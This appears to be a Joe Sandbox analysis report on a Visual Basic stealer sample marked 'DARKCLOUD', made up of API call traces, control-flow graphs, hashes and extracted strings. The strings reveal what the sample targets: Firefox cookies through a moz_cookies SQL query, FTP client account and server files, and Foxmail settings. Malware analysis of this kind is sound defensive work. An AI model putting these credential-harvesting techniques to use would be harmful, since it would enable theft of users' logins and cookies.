                                                            • Part of subcall function 0042ECB0: #645.MSVBVM60(00004008,00000010), ref: 0042F3B5
                                                            • Part of subcall function 0042ECB0: __vbaStrMove.MSVBVM60 ref: 0042F3C0
                                                            • Part of subcall function 0042ECB0: __vbaStrCmp.MSVBVM60(00405638,?), ref: 0042F3E3
                                                            • Part of subcall function 0042ECB0: __vbaStrCmp.MSVBVM60(00407034,?), ref: 0042F401
                                                            • Part of subcall function 0042ECB0: __vbaStrCmp.MSVBVM60(0040B454,?), ref: 0042F417
                                                            • Part of subcall function 0042ECB0: __vbaStrCat.MSVBVM60(?,00000001), ref: 0042F43D
                                                            • Part of subcall function 0042ECB0: __vbaStrMove.MSVBVM60 ref: 0042F448
                                                            • Part of subcall function 0042ECB0: #579.MSVBVM60(00000000), ref: 0042F44F
                                                            • Part of subcall function 0042ECB0: __vbaFreeStr.MSVBVM60 ref: 0042F469
                                                            • Part of subcall function 0042ECB0: __vbaRedimPreserve.MSVBVM60(00000180,00000004,?,00000008,00000001,00000000,00000000), ref: 0042F498
                                                          • __vbaVarAdd.MSVBVM60(?,00000008,?), ref: 00421D69
                                                          • __vbaStrVarMove.MSVBVM60(00000000), ref: 00421D70
                                                          • __vbaStrMove.MSVBVM60 ref: 00421D7E
                                                          • __vbaStrCopy.MSVBVM60 ref: 00421D92
                                                          • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 00421DBD
                                                          • __vbaFreeVarList.MSVBVM60(00000003,?,?,?,?,?,?,?,00000000,004030D6), ref: 00421DDD
                                                          • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,00000000,004030D6), ref: 00421DF8
                                                          • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000,004030D6), ref: 00421E12
                                                          • __vbaAryUnlock.MSVBVM60(?,004239B4), ref: 004238D9
                                                          • __vbaAryUnlock.MSVBVM60(?), ref: 004238E6
                                                          • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 004238FC
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042390E
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042391D
                                                          • __vbaFreeStr.MSVBVM60(?,00000000,004030D6), ref: 00423926
                                                          • __vbaFreeStr.MSVBVM60(?,00000000,004030D6), ref: 0042392F
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042393B
                                                          • __vbaFreeStr.MSVBVM60(?,00000000,004030D6), ref: 00423944
                                                          • __vbaFreeStr.MSVBVM60(?,00000000,004030D6), ref: 0042394D
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00423965
                                                          • __vbaFreeVar.MSVBVM60(?,00000000,004030D6), ref: 0042396E
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00423986
                                                          • __vbaFreeStr.MSVBVM60(?,00000000,004030D6), ref: 00423992
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004239A1
                                                          • __vbaFreeStr.MSVBVM60(?,00000000,004030D6), ref: 004239AD
                                                          • __vbaErrorOverflow.MSVBVM60 ref: 004239C8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Move$Free$Copy$DestructList$Bstr$ChkstkError$#516#631#712Construct2EachUnlock$#520#537#579#608#617#632#645#716CallExitLateOverflowPreserveRedimZero
                                                          • String ID: 013B331C3810262F625E4C$030F0E0C15$0724202A29$0B36333E120D246820143F$0C3313072C240423612308325B$0E3837142F$0F18071C0E2126612B1102020D$141C0B0F2D310B0A0525233705260B$1522070B1E1A3A1201331D190D0A$1B11273B0B2B1B32312231361F02053F2A$2435190333022824$250B2B0E313E131E2A21140101370612491D371910$2B152F08183138116F073105$33250134392504126B5048$351620240C2D33212B090A565854203F30282F3B39$392233162C39192D393109$3B0A1E26380C1C25$3D151B0503121C251A312F130B05101E1545050E2840$===============DARKCLOUD===============$@$C:\\$CopyFile$EPrpdCQjWOQmQkIHejAWXODGFTsdQMDBKF$Foxmail$HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Foxmail.url.mailto\Shell\open\command\$IKtURdOrQrJTUtVlROvWiJksPlxjRXfYF$KvWGqCPwJjbEahwFyEaHtclpMhLMZdkTc$KwTLkwDVeAtEbhikonDeQtnbYeRChNxbS$LjEIFuwIagJbWvTzDPnZsSVSDcmtKPRtDOvnpDghVu$MQrjmATXcbKBCpTnQeWeFoZmsCWHLbX$NJYCuslhStnYMXoegRKOxOkAMWedORFgYr$RegRead$Scripting.FileSystemObject$TcDrGNJvvKjh$Url : $VZWslqsTuRVoohxyApIZOsnmhgBXMscV$VaTxflgrQimnphjepakwkKpYtdHOUdpd$btfPHeNRUBfdv$lTHVnVqKJBd$nFboeyGjLSXZdNDBKtuiEFuv$nMYKSsdHFElZtgocMFxXVGZSajUxwsfQJgOogzRStYS$owAvqReMxvEKzUQvtucIgZZPWghaFykLhf$oyJHmrXtBkBwntYragiSxdH$xkkmUOcnApOwfnMrtRiLqYdmoMgvcQZQmvQyWtcMFt$yXKdngQROxygnaZpRrpTYKgVxGyOtGq
                                                          • API String ID: 3369885347-3580722378
                                                          • Opcode ID: 9c61ab30980ef436bf4b94c302d30464035fb3c07987bfe89eb7efe5969894af
                                                          • Instruction ID: 183a2b9ebfa072188e44c0b6334db17ed458975aa797906c928631bdf410eddd
                                                          • Opcode Fuzzy Hash: 9c61ab30980ef436bf4b94c302d30464035fb3c07987bfe89eb7efe5969894af
                                                          • Instruction Fuzzy Hash: AA13F975900228DFDB24DF60DD88FDEB7B9BB45300F1081EAA14AB62A0DB745B89CF55

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1830 4375f0-4376ab __vbaChkstk __vbaOnError #645 __vbaStrMove __vbaStrCmp __vbaFreeStr 1831 4376b1-437732 __vbaStrCat __vbaStrMove call 42f340 __vbaAryMove __vbaFreeStr 1830->1831 1832 43947e-43967f __vbaAryUnlock __vbaFreeVar __vbaAryDestruct __vbaFreeVar * 2 __vbaAryDestruct * 2 __vbaFreeVar __vbaAryDestruct __vbaFreeStr __vbaFreeVar * 4 __vbaFreeStr * 2 __vbaFreeVar * 2 1830->1832 1837 437734 1831->1837 1838 437739-437767 __vbaForEachAry 1831->1838 1836 439696-43969f __vbaErrorOverflow 1832->1836 1837->1832 1839 439471-439478 1838->1839 1839->1832 1840 43776c-4378c8 __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 __vbaStrMove __vbaVarCat #645 __vbaStrMove __vbaStrCmp __vbaFreeStrList __vbaFreeVarList 1839->1840 1845 439447-43946b __vbaNextEachAry 1840->1845 1846 4378ce-437b4d #716 __vbaVarZero __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 __vbaStrCopy __vbaStrMove call 42ddc0 __vbaStrMove __vbaStrCat __vbaVarCat __vbaChkstk * 2 __vbaObjVar __vbaLateMemCall __vbaFreeStrList __vbaFreeVarList 1840->1846 1845->1839 1855 437b53-437c70 __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 __vbaStrMove __vbaStrCat __vbaStrMove call 434500 __vbaFreeStrList __vbaStrCopy call 434340 __vbaFreeStr 1846->1855 1856 438495-4385d8 __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 __vbaStrMove * 2 __vbaStrCat __vbaStrMove __vbaStrToAnsi call 407b48 __vbaSetSystemError __vbaFreeStrList 1846->1856 1875 437c76-437c99 call 407d6c __vbaSetSystemError 1855->1875 1870 439340-439441 call 407b90 __vbaSetSystemError __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 __vbaStrMove __vbaStrCat #529 __vbaFreeStrList __vbaFreeVar 1856->1870 1871 4385de-4386a5 __vbaStrToAnsi * 2 call 4079a0 __vbaSetSystemError __vbaStrToUnicode __vbaVarMove __vbaFreeStrList call 407c10 __vbaSetSystemError #558 1856->1871 1870->1845 1871->1870 1885 4386ab-4386d0 call 407c10 __vbaSetSystemError 1871->1885 1886 437c9f-438368 call 434130 call 432b20 __vbaFreeVar __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove call 434130 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove call 434130 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaFreeStrList __vbaStrCat __vbaStrMove call 434130 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove call 434130 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrDate __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove call 434130 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaFreeStrList __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaFreeStrList __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaFreeStrList 1875->1886 1887 43836d-438490 call 407d24 __vbaSetSystemError call 434590 __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 __vbaStrMove __vbaStrCat #529 __vbaFreeStrList __vbaFreeVar 1875->1887 1885->1836 1896 4386d6-438714 __vbaI2I4 1885->1896 1886->1875 1887->1845 1896->1870 1903 43871a-438bc4 __vbaChkstk * 2 __vbaVarIndexLoad __vbaVarMove __vbaChkstk * 2 __vbaVarIndexLoad __vbaVarMove __vbaChkstk * 2 __vbaVarIndexLoad __vbaVarMove __vbaChkstk * 2 __vbaVarIndexLoad __vbaVarMove __vbaChkstk * 2 __vbaVarIndexLoad __vbaVarMove __vbaVarCmpEq * 2 __vbaVarOr __vbaVarCmpEq __vbaVarOr __vbaVarCmpEq __vbaVarOr __vbaVarCmpEq __vbaVarOr __vbaBoolVarNull 1896->1903 1906 439334-43933b 1903->1906 1907 438bca-439331 __vbaI4ErrVar call 432b20 __vbaFreeVar __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaVarAdd * 7 __vbaStrVarMove __vbaStrMove __vbaFreeStrList __vbaFreeVarList __vbaStrCat __vbaStrDate __vbaVarAdd * 15 __vbaStrVarMove __vbaStrMove __vbaFreeVarList __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaFreeStrList __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaFreeStrList 1903->1907 1907->1906
                                                          APIs
                                                          • __vbaChkstk.MSVBVM60(00000000,004030D6,?,?,?,?,004372CE,00000000), ref: 0043760E
                                                          • __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,004030D6), ref: 0043763E
                                                          • #645.MSVBVM60(00004008,00000010), ref: 00437667
                                                          • __vbaStrMove.MSVBVM60 ref: 00437675
                                                          • __vbaStrCmp.MSVBVM60(00405638,00000000), ref: 00437681
                                                          • __vbaFreeStr.MSVBVM60 ref: 0043769C
                                                          • __vbaStrCat.MSVBVM60(004055A8), ref: 004376DA
                                                          • __vbaAryMove.MSVBVM60(?,?,?,0043D064), ref: 00437710
                                                          • __vbaFreeStr.MSVBVM60 ref: 0043771C
                                                          • __vbaForEachAry.MSVBVM60(00000008,?,?,?,?), ref: 0043775B
                                                          • __vbaStrMove.MSVBVM60 ref: 004376E8
                                                            • Part of subcall function 0042ECB0: __vbaChkstk.MSVBVM60(00000000,004030D6), ref: 0042F35E
                                                            • Part of subcall function 0042ECB0: __vbaOnError.MSVBVM60(000000FF,6D42D8B1,?,6D41A323,00000000,004030D6), ref: 0042F38E
                                                            • Part of subcall function 0042ECB0: #645.MSVBVM60(00004008,00000010), ref: 0042F3B5
                                                            • Part of subcall function 0042ECB0: __vbaStrMove.MSVBVM60 ref: 0042F3C0
                                                            • Part of subcall function 0042ECB0: __vbaStrCmp.MSVBVM60(00405638,?), ref: 0042F3E3
                                                            • Part of subcall function 0042ECB0: __vbaStrCmp.MSVBVM60(00407034,?), ref: 0042F401
                                                            • Part of subcall function 0042ECB0: __vbaStrCmp.MSVBVM60(0040B454,?), ref: 0042F417
                                                            • Part of subcall function 0042ECB0: __vbaStrCat.MSVBVM60(?,00000001), ref: 0042F43D
                                                            • Part of subcall function 0042ECB0: __vbaStrMove.MSVBVM60 ref: 0042F448
                                                            • Part of subcall function 0042ECB0: #579.MSVBVM60(00000000), ref: 0042F44F
                                                            • Part of subcall function 0042ECB0: __vbaFreeStr.MSVBVM60 ref: 0042F469
                                                            • Part of subcall function 0042ECB0: __vbaRedimPreserve.MSVBVM60(00000180,00000004,?,00000008,00000001,00000000,00000000), ref: 0042F498
                                                          • __vbaAryUnlock.MSVBVM60(?,00439680), ref: 004395B6
                                                          • __vbaFreeVar.MSVBVM60 ref: 004395C2
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004395D1
                                                          • __vbaFreeVar.MSVBVM60 ref: 004395DA
                                                          • __vbaFreeVar.MSVBVM60 ref: 004395E3
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004395EF
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004395FB
                                                          • __vbaFreeVar.MSVBVM60 ref: 00439604
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00439610
                                                          • __vbaFreeStr.MSVBVM60 ref: 00439619
                                                          • __vbaFreeVar.MSVBVM60 ref: 00439625
                                                          • __vbaFreeVar.MSVBVM60 ref: 00439631
                                                          • __vbaFreeVar.MSVBVM60 ref: 0043963D
                                                          • __vbaFreeVar.MSVBVM60 ref: 00439649
                                                          • __vbaFreeStr.MSVBVM60 ref: 00439655
                                                          • __vbaFreeStr.MSVBVM60 ref: 00439661
                                                          • __vbaFreeVar.MSVBVM60 ref: 0043966D
                                                          • __vbaFreeVar.MSVBVM60 ref: 00439679
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Free$Move$Destruct$#645ChkstkError$#579EachPreserveRedimUnlock
                                                          • String ID: "Content raw": "$ "Expires raw": "$ "Expires": "$ "First Party Domain": ""$ "HTTP only raw": "false",$ "Host raw": "https://$ "Name raw": "$ "Path raw": "$ "SameSite raw": "no_restriction",$ "Send for raw": "false",$ "Send for": "Any type of connection",$ "Store raw": "firefox-default",$ "This domain only raw": "false",$ "This domain only": "Valid for subdomains",$0E33003C1E210D1A743A17152F1A0E$2C1003083F1E35027F0832$6$CopyFile$RpslgTwPqQlPvwROtkaodN$SELECT expiry, host, name, path, value FROM moz_cookies$Scripting.FileSystemObject$d$expiry$host$name$pRPoSuHhiZIfyFnkPjkxdFDZVQSBtCET$path$value
                                                          • API String ID: 3719278416-3556673606
                                                          • Opcode ID: 34138d5798142d64515c342307399d0eb7cf95d5319861f6188db78b6f13091b
                                                          • Instruction ID: 43420eaac984232e9af21603fadc0c5cbb8924fb70437fcd59561cef64829787
                                                          • Opcode Fuzzy Hash: 34138d5798142d64515c342307399d0eb7cf95d5319861f6188db78b6f13091b
                                                          • Instruction Fuzzy Hash: 29030C75900119DFDB25DFA0DD88FDEB7B8BB48301F1082EAE54AB6160EB745A88CF54
                                                          APIs
                                                          • __vbaChkstk.MSVBVM60(00000000,004030D6), ref: 00412DFE
                                                          • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004030D6), ref: 00412E2E
                                                          • __vbaUbound.MSVBVM60(00000001,006597C0,?,?,?,00000000,004030D6), ref: 00412E43
                                                          • __vbaI2I4.MSVBVM60(?,?,?,00000000,004030D6), ref: 00412E4B
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00412EE8
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00412F05
                                                          • __vbaStrCat.MSVBVM60(\accounts.xml,006597C0), ref: 00412F28
                                                          • #645.MSVBVM60(00000008,00000000), ref: 00412F47
                                                          • __vbaStrMove.MSVBVM60 ref: 00412F52
                                                          • __vbaStrCmp.MSVBVM60(00405638,00000000), ref: 00412F5E
                                                          • __vbaFreeStr.MSVBVM60 ref: 00412F76
                                                          • __vbaFreeVar.MSVBVM60 ref: 00412F82
                                                          • __vbaNew2.MSVBVM60(00405800,00000000), ref: 00412FAD
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0041301D
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0041303A
                                                          • __vbaStrCat.MSVBVM60(\accounts.xml,006597C0), ref: 0041305E
                                                          • __vbaChkstk.MSVBVM60(?), ref: 00413080
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405810,000000E8), ref: 004130E8
                                                          • __vbaFreeVar.MSVBVM60 ref: 00413106
                                                          • __vbaNew2.MSVBVM60(00405800,00000000), ref: 00413122
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405810,000000B4), ref: 0041318F
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00405940,00000030), ref: 004131F2
                                                          • __vbaObjSet.MSVBVM60(?,?), ref: 0041322E
                                                          • __vbaForEachCollObj.MSVBVM60(00405940,?,?,00000000), ref: 00413245
                                                          • __vbaFreeObj.MSVBVM60 ref: 00413257
                                                          • __vbaStrCopy.MSVBVM60 ref: 00413271
                                                          • __vbaStrMove.MSVBVM60(?), ref: 00413285
                                                          • __vbaStrCopy.MSVBVM60 ref: 00413293
                                                          • __vbaStrMove.MSVBVM60(?), ref: 004132A7
                                                          • __vbaStrCopy.MSVBVM60 ref: 004132B5
                                                          • __vbaStrMove.MSVBVM60 ref: 004132D4
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405940,00000030), ref: 00413310
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406444,0000001C), ref: 00413375
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00405940,00000068), ref: 004133D5
                                                          • __vbaStrCopy.MSVBVM60 ref: 004133F5
                                                          • __vbaStrMove.MSVBVM60 ref: 00413414
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405940,00000030), ref: 00413450
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406444,0000001C), ref: 004134B5
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405940,00000068), ref: 00413515
                                                          • __vbaStrMove.MSVBVM60(?,?,0065A764), ref: 00413546
                                                          • __vbaStrCat.MSVBVM60(00000000), ref: 0041354D
                                                          • __vbaStrMove.MSVBVM60 ref: 00413558
                                                          • __vbaStrCat.MSVBVM60(?,00000000), ref: 00413563
                                                          • __vbaStrMove.MSVBVM60 ref: 0041356E
                                                          • __vbaStrMove.MSVBVM60(?,?,00405824,00000000), ref: 0041358C
                                                          • __vbaStrCat.MSVBVM60(00000000), ref: 00413593
                                                          • __vbaStrMove.MSVBVM60 ref: 0041359E
                                                          • __vbaStrCat.MSVBVM60(00000000), ref: 004135A5
                                                          • __vbaStrMove.MSVBVM60 ref: 004135B0
                                                          • __vbaStrCat.MSVBVM60(?,00000000), ref: 004135BB
                                                          • __vbaStrMove.MSVBVM60 ref: 004135C6
                                                          • __vbaStrCat.MSVBVM60(00405824,00000000), ref: 004135D2
                                                          • __vbaStrMove.MSVBVM60 ref: 004135DF
                                                          • __vbaFreeStrList.MSVBVM60(00000011,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041362B
                                                          • __vbaFreeObjList.MSVBVM60(00000004,?,?,?,?), ref: 00413652
                                                          • __vbaStrMove.MSVBVM60(?), ref: 0041367E
                                                          • __vbaStrCopy.MSVBVM60 ref: 0041368C
                                                          • __vbaStrMove.MSVBVM60(?), ref: 004136A0
                                                          • __vbaStrCopy.MSVBVM60 ref: 004136AE
                                                          • __vbaStrMove.MSVBVM60 ref: 004136CD
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405940,00000030), ref: 00413709
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406444,0000001C), ref: 0041376E
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405940,00000068), ref: 004137CE
                                                          • __vbaStrCopy.MSVBVM60 ref: 004137EE
                                                          • __vbaStrMove.MSVBVM60 ref: 0041380D
                                                          • __vbaStrMove.MSVBVM60(?,?,0065A764), ref: 0041382C
                                                          • __vbaStrCat.MSVBVM60(00000000), ref: 00413833
                                                          • __vbaStrMove.MSVBVM60 ref: 0041383E
                                                          • __vbaStrCat.MSVBVM60(?,00000000), ref: 00413849
                                                          • __vbaStrMove.MSVBVM60 ref: 00413854
                                                          • __vbaStrMove.MSVBVM60(?,?,00405824,00000000), ref: 00413872
                                                          • __vbaStrCat.MSVBVM60(00000000), ref: 00413879
                                                          • __vbaStrMove.MSVBVM60 ref: 00413884
                                                          • __vbaStrCat.MSVBVM60(00000000), ref: 0041388B
                                                          • __vbaStrMove.MSVBVM60 ref: 00413896
                                                          • __vbaStrCat.MSVBVM60(===============DARKCLOUD===============,00405824,00000000), ref: 004138A7
                                                          • __vbaStrMove.MSVBVM60 ref: 004138B2
                                                          • __vbaStrCat.MSVBVM60(00000000), ref: 004138B9
                                                          • __vbaStrMove.MSVBVM60 ref: 004138C4
                                                          • __vbaStrCat.MSVBVM60(00405824,00000000), ref: 004138D0
                                                          • __vbaStrMove.MSVBVM60 ref: 004138DD
                                                          • __vbaFreeStrList.MSVBVM60(00000011,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00413929
                                                          • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00413942
                                                          • __vbaNextEachCollObj.MSVBVM60(00405940,?,?), ref: 00413962
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 004139CA
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 004139E7
                                                          • __vbaStrCat.MSVBVM60(\recentservers.xml,006597C0), ref: 00413A0B
                                                          • #645.MSVBVM60(00000008,00000000), ref: 00413A2A
                                                          • __vbaStrMove.MSVBVM60 ref: 00413A35
                                                          • __vbaStrCmp.MSVBVM60(00405638,00000000), ref: 00413A41
                                                          • __vbaFreeStr.MSVBVM60 ref: 00413A59
                                                          • __vbaFreeVar.MSVBVM60 ref: 00413A65
                                                          • __vbaNew2.MSVBVM60(00405800,00000000), ref: 00413A90
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00413AFF
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00413B1C
                                                          • __vbaStrCat.MSVBVM60(\recentservers.xml,006597C0), ref: 00413B40
                                                          • __vbaChkstk.MSVBVM60(?), ref: 00413B62
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405810,000000E8), ref: 00413BCA
                                                          • __vbaFreeVar.MSVBVM60 ref: 00413BE8
                                                          • __vbaNew2.MSVBVM60(00405800,00000000), ref: 00413C04
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405810,000000DC), ref: 00413C76
                                                          • __vbaObjSet.MSVBVM60(?,?), ref: 00413CB2
                                                          • __vbaForEachCollObj.MSVBVM60(00405940,?,?,00000000), ref: 00413CC9
                                                          • __vbaStrCopy.MSVBVM60 ref: 00413CE9
                                                          • __vbaStrMove.MSVBVM60(?), ref: 00413CFD
                                                          • __vbaStrCopy.MSVBVM60 ref: 00413D0B
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 00413D42
                                                          • __vbaStrCopy.MSVBVM60 ref: 00413D50
                                                          • __vbaStrMove.MSVBVM60(?), ref: 00413D64
                                                          • __vbaStrCopy.MSVBVM60 ref: 00413D72
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 00413DAC
                                                          • __vbaStrMove.MSVBVM60(00000000), ref: 00413DD2
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405940,00000094), ref: 00413E0E
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00405940,00000068), ref: 00413E6E
                                                          • __vbaStrMove.MSVBVM60(?), ref: 00413EAC
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405940,00000094), ref: 00413EE8
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405940,00000068), ref: 00413F48
                                                          • __vbaStrCat.MSVBVM60(Url : ftp://,0065A764), ref: 00413F6B
                                                          • __vbaStrMove.MSVBVM60 ref: 00413F76
                                                          • __vbaStrCat.MSVBVM60(?,00000000), ref: 00413F81
                                                          • __vbaStrMove.MSVBVM60 ref: 00413F8C
                                                          • __vbaStrCat.MSVBVM60(00406590,00000000), ref: 00413F98
                                                          • __vbaStrMove.MSVBVM60 ref: 00413FA3
                                                          • __vbaStrCat.MSVBVM60(?,00000000), ref: 00413FAE
                                                          • __vbaStrMove.MSVBVM60 ref: 00413FB9
                                                          • __vbaStrCat.MSVBVM60(0040505C,00000000), ref: 00413FC5
                                                          • __vbaStrMove.MSVBVM60 ref: 00413FD0
                                                          • __vbaStrCat.MSVBVM60(00405824,00000000), ref: 00413FDC
                                                          • __vbaStrMove.MSVBVM60 ref: 00413FE9
                                                          • __vbaFreeStrList.MSVBVM60(00000013,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00414040
                                                          • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00414059
                                                          • __vbaStrCopy.MSVBVM60 ref: 00414071
                                                          • __vbaStrMove.MSVBVM60(?), ref: 00414085
                                                          • __vbaStrCopy.MSVBVM60 ref: 00414093
                                                          • __vbaStrMove.MSVBVM60(?), ref: 004140A7
                                                          • __vbaStrCopy.MSVBVM60 ref: 004140B5
                                                          • __vbaStrMove.MSVBVM60 ref: 004140D4
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 004140EC
                                                          • __vbaStrCopy.MSVBVM60 ref: 004140FA
                                                          • __vbaStrMove.MSVBVM60 ref: 00414119
                                                          • __vbaStrMove.MSVBVM60(?), ref: 0041413F
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405940,00000094), ref: 0041417B
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405940,00000068), ref: 004141DB
                                                          • __vbaStrMove.MSVBVM60(?,?,0065A764), ref: 0041420C
                                                          • __vbaStrCat.MSVBVM60(00000000), ref: 00414213
                                                          • __vbaStrMove.MSVBVM60 ref: 0041421E
                                                          • __vbaStrCat.MSVBVM60(?,00000000), ref: 00414229
                                                          • __vbaStrMove.MSVBVM60 ref: 00414234
                                                          • __vbaStrCat.MSVBVM60(00405824,00000000), ref: 00414240
                                                          • __vbaStrMove.MSVBVM60 ref: 0041424D
                                                          • __vbaFreeStrList.MSVBVM60(0000000E,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041428D
                                                          • __vbaFreeObj.MSVBVM60 ref: 0041429C
                                                          • __vbaStrCopy.MSVBVM60 ref: 004142B1
                                                          • __vbaStrMove.MSVBVM60(?), ref: 004142C5
                                                          • __vbaStrCopy.MSVBVM60 ref: 004142D3
                                                          • __vbaStrMove.MSVBVM60 ref: 004142F2
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 0041430A
                                                          • __vbaStrMove.MSVBVM60(?), ref: 00414330
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405940,00000094), ref: 0041436C
